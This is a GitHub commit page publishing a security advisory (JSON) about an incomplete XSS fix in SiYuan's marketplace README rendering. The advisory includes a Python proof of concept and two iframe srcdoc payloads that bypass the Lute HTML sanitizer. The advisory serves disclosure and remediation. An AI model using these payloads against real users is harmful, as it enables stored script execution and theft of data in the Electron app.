Skip to content

Commit 5be5f54

Browse files
advisory-database[bot]advisory-database[bot]
committed
Publish Advisories
GHSA-8q5w-mmxf-48jg GHSA-8qm8-g55h-xmqr GHSA-ffw8-fwxp-h64w GHSA-hg7g-56h5-5pqr GHSA-rq2q-4r55-9877 GHSA-vvfw-4m39-fjqf GHSA-x2pw-9c38-cp2j
1 parent 0bff3ca commit 5be5f54

7 files changed

Lines changed: 422 additions & 0 deletions

File tree

advisories/github-reviewed/2026/04/GHSA-8q5w-mmxf-48jg/GHSA-8q5w-mmxf-48jg.json

Lines changed: 67 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,67 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-8q5w-mmxf-48jg",
4+
"modified": "2026-04-14T23:12:19Z",
5+
"published": "2026-04-14T23:12:18Z",
6+
"aliases": [],
7+
"summary": "SiYuan has incomplete fix for CVE-2026-33066: XSS",
8+
"details": "### Summary\n\nThe incomplete fix for SiYuan's bazaar README rendering enables the Lute HTML sanitizer but fails to block `<iframe>` tags, allowing stored XSS via `srcdoc` attributes containing embedded scripts that execute in the Electron context.\n\n### Affected Package\n\n- **Ecosystem:** Go\n- **Package:** github.com/siyuan-note/siyuan\n- **Affected versions:** < commit b382f50e1880\n- **Patched versions:** >= commit b382f50e1880\n\n### Details\n\nThe `renderPackageREADME()` function in `kernel/bazaar/readme.go` renders Markdown README content from bazaar (marketplace) packages into HTML. The original vulnerability allowed stored XSS through unsanitized HTML in READMEs. The fix adds `luteEngine.SetSanitize(true)` to enable Lute's built-in HTML sanitizer.\n\nHowever, the Lute sanitizer in `lute/render/sanitizer.go` has a critical gap:\n1. `<iframe>` is explicitly commented out of `setOfElementsToSkipContent`, so iframe tags pass through.\n2. The `srcdoc` attribute is checked against URL-prefix blocklists (`javascript:`, `data:text/html`), but `srcdoc` contains raw HTML content, not a URL. A value like `<img src=x onerror=alert(1)>` does not start with any blocked prefix.\n3. The browser renders `srcdoc` HTML in a nested browsing context, executing embedded scripts and event handlers.\n\nThe fix correctly blocks direct `<script>` tags, event handler attributes, and `javascript:` protocol links. However:\n\n- `<iframe srcdoc=\"<script>alert(document.domain)</script>\">` passes through because iframe is not blocked and the srcdoc value is raw HTML (not a URL scheme).\n- `<iframe srcdoc=\"<img src=x onerror=alert(document.cookie)>\">` also passes because the event handler is inside the srcdoc string value, not a top-level tag attribute.\n\n### PoC\n\n```python\n\"\"\"\nCVE-2026-33066 - Incomplete Sanitization in SiYuan Bazaar README Rendering\n\nComponent: kernel/bazaar/readme.go :: renderPackageREADME()\nPatch: https://github.com/siyuan-note/siyuan/commit/b382f50e1880ed996364509de5a10a72d7409428\n\"\"\"\n\nimport re\nimport sys\nfrom html.parser import HTMLParser\n\nELEMENTS_TO_SKIP_CONTENT = {\n \"frame\", \"frameset\",\n # \"iframe\", # NOTE: iframe is commented out in the original Go code!\n \"noembed\", \"noframes\", \"noscript\", \"nostyle\",\n \"object\", \"script\", \"style\", \"title\",\n}\n\nEVENT_ATTRS = {\n \"onafterprint\", \"onbeforeprint\", \"onbeforeunload\", \"onerror\",\n \"onhashchange\", \"onload\", \"onmessage\", \"onoffline\", \"ononline\",\n \"onpagehide\", \"onpageshow\", \"onpopstate\", \"onresize\", \"onstorage\",\n \"onunload\", \"onblur\", \"onchange\", \"oncontextmenu\", \"onfocus\",\n \"oninput\", \"oninvalid\", \"onreset\", \"onsearch\", \"onselect\",\n \"onsubmit\", \"onkeydown\", \"onkeypress\", \"onkeyup\", \"onclick\",\n \"ondblclick\", \"onmousedown\", \"onmousemove\", \"onmouseout\",\n \"onmouseover\", \"onmouseleave\", \"onmouseenter\", \"onmouseup\",\n \"onmousewheel\", \"onwheel\", \"ondrag\", \"ondragend\", \"ondragenter\",\n \"ondragleave\", \"ondragover\", \"ondragstart\", \"ondrop\", \"onscroll\",\n \"oncopy\", \"oncut\", \"onpaste\", \"onabort\", \"oncanplay\",\n \"oncanplaythrough\", \"oncuechange\", \"ondurationchange\", \"onemptied\",\n \"onended\", \"onloadeddata\", \"onloadedmetadata\", \"onloadstart\",\n \"onpause\", \"onplay\", \"onplaying\", \"onprogress\", \"onratechange\",\n \"onseeked\", \"onseeking\", \"onstalled\", \"onsuspend\", \"ontimeupdate\",\n \"onvolumechange\", \"onwaiting\", \"ontoggle\", \"onbegin\", \"onend\",\n \"onrepeat\", \"http-equiv\", \"formaction\",\n}\n\nURL_ATTRS = {\"src\", \"srcdoc\", \"srcset\", \"href\"}\nBLOCKED_URL_PREFIXES = (\"data:image/svg+xml\", \"data:text/html\", \"javascript\")\nSELF_CLOSING_TAGS = {\"img\", \"br\", \"hr\", \"input\", \"meta\", \"link\", \"area\",\n \"base\", \"col\", \"embed\", \"source\", \"track\", \"wbr\"}\n\n\ndef sanitize_attr_value_for_url(key, val):\n cleaned = val.lower().strip()\n cleaned = ''.join(c for c in cleaned if not c.isspace() or c == ' ')\n for prefix in BLOCKED_URL_PREFIXES:\n if cleaned.startswith(prefix):\n return False\n return True\n\n\nclass LuteSanitizer(HTMLParser):\n def __init__(self):\n super().__init__(convert_charrefs=False)\n self.output = []\n self.skip_depth = 0\n\n def handle_starttag(self, tag, attrs):\n tag = tag.lower()\n if tag in ELEMENTS_TO_SKIP_CONTENT:\n self.skip_depth += 1\n self.output.append(\" \")\n return\n if self.skip_depth > 0:\n return\n sanitized_attrs = []\n for key, val in attrs:\n key = key.lower()\n if val is None: val = \"\"\n if key in EVENT_ATTRS: continue\n if key in URL_ATTRS:\n if not sanitize_attr_value_for_url(key, val): continue\n sanitized_attrs.append((key, val))\n parts = [\"<\" + tag]\n for key, val in sanitized_attrs:\n escaped_val = val.replace(\"&\", \"&amp;\").replace('\"', \"&quot;\")\n parts.append(f' {key}=\"{escaped_val}\"')\n if tag in SELF_CLOSING_TAGS: parts.append(\" /\")\n parts.append(\">\")\n self.output.append(\"\".join(parts))\n\n def handle_endtag(self, tag):\n tag = tag.lower()\n if tag in ELEMENTS_TO_SKIP_CONTENT:\n self.skip_depth -= 1\n if self.skip_depth < 0: self.skip_depth = 0\n self.output.append(\" \")\n return\n if self.skip_depth > 0: return\n self.output.append(f\"</{tag}>\")\n\n def handle_data(self, data):\n if self.skip_depth > 0: return\n self.output.append(data)\n\n def handle_entityref(self, name):\n if self.skip_depth > 0: return\n self.output.append(f\"&{name};\")\n\n def handle_charref(self, name):\n if self.skip_depth > 0: return\n self.output.append(f\"&#{name};\")\n\n def handle_comment(self, data): pass\n def handle_decl(self, decl): pass\n\n def get_output(self): return \"\".join(self.output)\n\n\ndef sanitize_html(html_str):\n sanitizer = LuteSanitizer()\n sanitizer.feed(html_str)\n return sanitizer.get_output()\n\n\ndef check_xss(html_output):\n findings = []\n srcdoc_match = re.search(r'srcdoc=\"([^\"]*)\"', html_output, re.IGNORECASE)\n if srcdoc_match:\n import html as html_mod\n decoded = html_mod.unescape(srcdoc_match.group(1).lower())\n if '<script' in decoded:\n findings.append(\"iframe srcdoc: embedded <script> tag\")\n if re.search(r'on\\w+\\s*=', decoded):\n findings.append(\"iframe srcdoc: event handler in nested HTML\")\n return findings\n\n\nPAYLOADS = [\n '<iframe srcdoc=\"<script>alert(document.domain)</script>\"></iframe>',\n '<iframe srcdoc=\"<img src=x onerror=alert(document.cookie)>\"></iframe>',\n]\n\nbypass_found = False\nfor payload in PAYLOADS:\n fixed_output = sanitize_html(payload)\n findings = check_xss(fixed_output)\n if findings:\n bypass_found = True\n print(f\"BYPASS: {payload[:80]}\")\n for f in findings:\n print(f\" - {f}\")\n\nif bypass_found:\n print(\"\\nVULNERABILITY CONFIRMED\")\n sys.exit(0)\nelse:\n print(\"\\nVULNERABILITY NOT CONFIRMED\")\n sys.exit(1)\n```\n\n```bash\npython3 poc.py\n```\n\n**Steps to reproduce:**\n1. `git clone https://github.com/siyuan-note/siyuan /tmp/siyuan_test`\n2. `cd /tmp/siyuan_test && git checkout b382f50e1880ed996364509de5a10a72d7409428~1`\n3. `python3 poc.py` (or `go run poc.go` if Go PoC)\n\n**Expected output:**\n```\nVULNERABILITY CONFIRMED\nIframe tags with srcdoc attributes bypass the Lute sanitizer, allowing embedded scripts to execute in the Electron context.\n```\n\n### Impact\n\nA malicious bazaar package author can include `<iframe srcdoc='<script>...</script>'>` in their README.md. When other users view the package in SiYuan's marketplace UI, the XSS executes in the Electron context with full application privileges, enabling data theft, local file access, and arbitrary code execution on the user's machine.\n\n### Suggested Remediation\n\n1. Add `iframe` to the `setOfElementsToSkipContent` set in the Lute sanitizer.\n2. If iframes must be preserved, strip the `srcdoc` attribute entirely or sanitize its HTML content recursively.\n3. Apply a Content Security Policy (CSP) to the README rendering context.\n\n### References\n\n- Incomplete fix commit: https://github.com/siyuan-note/siyuan/commit/b382f50e1880ed996364509de5a10a72d7409428\n- Original CVE: CVE-2026-33066",
9+
"severity": [
10+
{
11+
"type": "CVSS_V4",
12+
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"
13+
}
14+
],
15+
"affected": [
16+
{
17+
"package": {
18+
"ecosystem": "Go",
19+
"name": "github.com/siyuan-note/siyuan/kernel"
20+
},
21+
"ranges": [
22+
{
23+
"type": "ECOSYSTEM",
24+
"events": [
25+
{
26+
"introduced": "0"
27+
},
28+
{
29+
"fixed": "0.0.0-20260414013942-62eed37a3263"
30+
}
31+
]
32+
}
33+
]
34+
}
35+
],
36+
"references": [
37+
{
38+
"type": "WEB",
39+
"url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-8q5w-mmxf-48jg"
40+
},
41+
{
42+
"type": "ADVISORY",
43+
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33066"
44+
},
45+
{
46+
"type": "WEB",
47+
"url": "https://github.com/siyuan-note/siyuan/commit/b382f50e1880ed996364509de5a10a72d7409428"
48+
},
49+
{
50+
"type": "PACKAGE",
51+
"url": "https://github.com/siyuan-note/siyuan"
52+
},
53+
{
54+
"type": "WEB",
55+
"url": "https://github.com/siyuan-note/siyuan/releases/tag/v3.6.4"
56+
}
57+
],
58+
"database_specific": {
59+
"cwe_ids": [
60+
"CWE-79"
61+
],
62+
"severity": "MODERATE",
63+
"github_reviewed": true,
64+
"github_reviewed_at": "2026-04-14T23:12:18Z",
65+
"nvd_published_at": null
66+
}
67+
}

0 commit comments

Comments
 (0)